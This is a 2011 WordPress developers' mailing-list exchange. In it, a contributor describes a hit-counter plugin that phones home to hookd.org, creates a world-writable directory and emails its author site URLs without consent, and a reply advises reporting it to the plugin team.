[wp-hackers] Hookd? Sketchy Plugin Include
Mika A Epstein
ipstenu at ipstenu.org
Tue Sep 13 23:29:49 UTC 2011
Well the emailing the author info without asking for it first is a flat out no-no (and should be reported to plugins at wordpress.org).
----
Mika A Epstein (aka Ipstenu)
http://ipstenu.org
On 13 Sep 2011, at 5:28:01PM, Jackson Whelan wrote:
> Howdy,
>
> Trying to help someone in the forums complaining about a plugin (http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing their site to crawl, and stumbled across this included file which looks like it could be used for great malfeasance.
>
> http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/class.resource.php
>
> Makes calls to hookd.org and requests actions and filters to be added. Creates a world-writable directory while it's at it as well.
>
> Is anyone familiar with hookd.org? Am I paranoid for thinking this is dubious?
>
> As a bonus the plugin emails the author with the URL of the site it was activated on, with no user consent or knowledge.
>
> http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/image.php
>
> Which would make sense as it would allow them to fine tune the junk they deploy.
>
> I found this related post in the forums from a year ago.
>
> http://wordpress.org/support/topic/my-site-hacked?replies=14
>
> I've already emailed plugins at wordpress.org, but thought I'd ask if anyone here was aware of this.
>
> No comment on hit counters being used in 2011, but if you'd like to step into the wayback machine just look at the screenshots : )
>
> Thanks! Jackson
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
More information about the wp-hackers
mailing list